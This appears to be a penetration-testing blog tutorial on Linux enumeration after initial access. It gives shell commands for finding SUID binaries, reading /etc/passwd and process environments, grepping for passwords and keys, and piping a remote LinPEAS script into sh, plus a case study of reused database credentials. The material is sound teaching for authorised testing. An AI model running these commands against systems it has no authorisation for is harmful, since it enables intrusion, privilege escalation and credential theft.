Greetings, fellow hackers and red team enthusiasts! As we all know, the initial enumeration stage is critical to any successful penetration test or red team operation. A deep understanding of a target’s Linux system is essential in identifying vulnerabilities, configuration flaws, and potential attack vectors. In this comprehensive guide, I will walk you through the best practices and techniques for gathering information about a Linux system during the initial enumeration process. We will explore command-line tools, examine real-world examples, and delve into code samples to ensure you’re well-equipped for your next Linux-based engagement.
The enumeration mindset: The foundation of exploitation#
Before we jump into the commands, let’s talk about the mindset. enumeration is more than running a list of commands and dumping output to a text file. This process is about building a mental map of the environment. You are looking for the “how” and the “why.” How is this system managed? Why is this specific service running? Who uses this machine? What is the likely path for privilege escalation?
When you first land on a box—whether via a web shell, a low-privilege SSH login,
or an exploit—your heartbeat probably picks up. Stay calm. Your goal is to
remain undetected while gathering the intelligence needed to escalate privileges
or pivot. Every command you run produces a trace. While many sysadmins aren’t
actively monitoring every command run by www-data, a sophisticated EDR or a
vigilant blue team member might be.
The Approach#
I follow a structured approach to this phase:
- System Profiling: What is the environment?
- User Profiling: Who is here and what can they do?
- Network Profiling: Where can I reach from here?
- Software Profiling: What is running and is it vulnerable?
- Permission Profiling: Where did the sysadmin get lazy?
This structure ensures that you don’t miss anything. Let’s dive in.
Phase 1: System Information - Knowing the Terrain#
The first step is to understand what you’re dealing with. This includes the operating system version, kernel version, and architecture. This information is crucial for identifying potential kernel exploits.
Operating System and Kernel#
Finding the exact kernel version is your top priority if you are looking for a privilege escalation exploit.
# Get the kernel version and architecture
# This is often the first command I run.
uname -a
# View the operating system distribution and version
# Different distributions store their version info in different places.
cat /etc/os-release
cat /etc/issue
cat /etc/*-release
# Alternative for OS information (often gives cleaner output)
lsb_release -a 2>/dev/null
[!NOTE] When looking at kernel versions, pay attention to the release date. An older kernel might be vulnerable to well-known exploits like Dirty COW (CVE-2016-5195) or the more recent PwnKit (CVE-2021-4034). If the kernel is from before 2021, there’s a good chance it’s vulnerable to something major.
Architecture and CPU Information#
Knowing the architecture (x86, x64, ARM) is essential for compiling or transferring binaries. You don’t want to transfer a 64-bit exploit to a 32-bit system.
# Get CPU details - helpful for understanding the processing power
lscpu
# View processor info from the proc filesystem
cat /proc/cpuinfo | grep "model name" | uniq
Phase 2: User and Group Information - Who’s the Boss?#
Understanding who uses the system and their privilege levels can reveal potential paths for lateral movement or privilege escalation.
Current User Context#
Who are you? What groups do you belong to? The id command is your best friend
here.
# Print current user and group IDs
id
# Check for specific interesting groups
# Groups like 'docker', 'lxd', 'sudo', 'wheel', and 'adm' are high-value.
If you see you are in the docker group, you essentially have root. You can
start a container, mount the host’s root filesystem, and you’re done.
User Discovery#
# See who is currently logged in
who -a
# See what users are doing (and their source IP)
w
# Show last logged in users - useful for identifying active admins
last -F | head -n 20
The /etc/passwd File#
The /etc/passwd file is a goldmine. It lists all users on the system. Even if
you can’t read /etc/shadow, the passwd file tells you which users have shells.
# List all users
cat /etc/passwd
# Extract only human users (UID >= 1000)
# This assumes a standard Linux installation.
grep -E '^[^:]+:[^:]+:[1-9][0-9]{3,}' /etc/passwd
# Look for users with shell access
grep -v "nologin" /etc/passwd | grep -v "false"
Phase 3: Network Information - Mapping the Pivot#
Networking details help you understand the system’s role in the larger environment and identify potential pivot points.
Interfaces and IP Addresses#
# List network interfaces and IP addresses
# 'ip addr' is the modern way; 'ifconfig' is legacy.
ip addr || ifconfig
# View the routing table - very important for identifying internal networks
ip route
Active Connections and Listening Ports#
This tells you what services are running and who the system is communicating with.
# List listening ports with process names
# -n: numeric addresses, -t: tcp, -l: listening, -p: program name
ss -ntlp || netstat -ntlp
# View established connections
# This can show you where the admins are connecting from.
ss -atp
DNS and Hosts#
# View DNS configuration - identifies internal DNS servers
cat /etc/resolv.conf
# View the local hosts file
# Often contains internal hostnames and IP addresses not in public DNS.
cat /etc/hosts
ARP Cache#
Understanding what other machines this machine has talked to.
ip neigh
arp -e
Phase 4: Services and Processes - Finding the Weak Links#
Investigating running services can reveal misconfigured applications or vulnerable software.
Process Identification#
# List all running processes
ps aux
# Look for processes running as root or other high-privilege users
ps aux | grep root
ps aux | grep "^[a-zA-Z]" | grep -v "root" # Processes not running as root
Service Management#
# List all services and their status (Systemd)
systemctl list-units --type=service
# List services using the older SysV init style
ls /etc/init.d/
Scheduled Tasks (Cron Jobs)#
Cron jobs often run with high privileges. If you can modify a script executed by a root cron job, you can get root access.
# View current user's crontab
crontab -l
# View system-wide crontabs
ls -la /etc/cron*
cat /etc/crontab
[!IMPORTANT] When looking at
/etc/crontab, check thePATHvariable. If it includes a world-writable directory, you can perform a PATH hijacking attack.
Phase 5: File System and Permissions - The SUID Treasure Hunt#
This is where many privilege escalation vectors are found. We’re looking for files with improper permissions.
SUID and SGID Binaries#
Binaries with the SUID (Set User ID) bit set run with the privileges of the file’s owner (often root).
# Find SUID binaries
find / -perm -4000 2>/dev/null
# Find SGID binaries
find / -perm -2000 2>/dev/null
[!TIP] Once you find a SUID binary, check GTFOBins to see if it can be exploited for privilege escalation.
World-Writable Files and Directories#
These can be used for persistence or to influence processes running as other users.
# Find world-writable files
find / -perm -2 -type f 2>/dev/null
# Find world-writable directories
find / -perm -2 -type d 2>/dev/null
Capabilities#
Linux capabilities provide more granular control than traditional SUID bits.
# List files with capabilities
getcap -r / 2>/dev/null
Phase 6: Software and Packages - Vulnerability Hunting#
Often, the path to root involves exploiting an outdated or misconfigured package.
# Debian/Ubuntu (DEB-based)
dpkg -l
# RedHat/CentOS (RPM-based)
rpm -qa
# Look for specific versions of high-value packages
dpkg -l | grep "sudo"
dpkg -l | grep "ssh"
Check the versions against Exploit-DB or using
searchsploit.
Phase 7: Environment Variables and Secrets#
Developers often store API keys, database credentials, or even passwords in environment variables or configuration files.
Environment Variables#
# View current environment variables
env
export
cat /proc/self/environ | tr '\0' '\n'
Searching for Secrets#
# Search for 'password', 'key', or 'token' in the /var/www directory
grep -rni "password" /var/www 2>/dev/null
grep -rni "key" /etc/*.conf 2>/dev/null
Phase 8: Automation Tools - Standing on the Shoulders of Giants#
While manual enumeration is essential for understanding the system, automation tools can save time and catch things you might miss.
- LinPEAS: The undisputed king of Linux privilege escalation tools.
- LinEnum: A modular bash script that covers most of the basics.
- Linux Exploit Suggester: Specifically focuses on kernel exploits.
Using LinPEAS Effectively#
LinPEAS is noisy. If you have internet access, you can run it directly:
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
But usually, you’ll want to transfer it. If you have a meterpreter session, use
upload. If you have SSH, use scp.
Case study: A real-world enumeration win#
During an engagement, I landed on a web server as www-data. Manual enumeration
didn’t reveal much: no easy SUIDs, kernel was patched.
I checked env and found DATABASE_URL=postgres://dbuser:s3cr3tP@ss@10.10.20.5:5432/myapp.
I then checked ip addr and realized I had an interface on the 10.10.20.0/24
network. I used the credentials to connect to the database, found the admin user
table, and extracted an admin hash which I cracked. That admin used the same
password for their SSH login on the web server. From there, I found they were in
the sudo group. Game over.
The lesson: Enumeration isn’t just about root; it’s about data.
Conclusion#
Linux enumeration is an art form. It requires patience, a keen eye for detail, and a structured approach. Every system you encounter will be different, but these tools and techniques provide the foundation you need.
Stay sharp, never stop learning, and remember: the more you know about your target, the more ways you’ll find to break it.
Until next time, this is UncleSp1d3r, signing off.
